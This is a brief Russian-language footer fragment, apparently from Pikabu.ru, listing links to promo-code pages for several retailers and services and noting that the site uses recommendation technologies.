Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии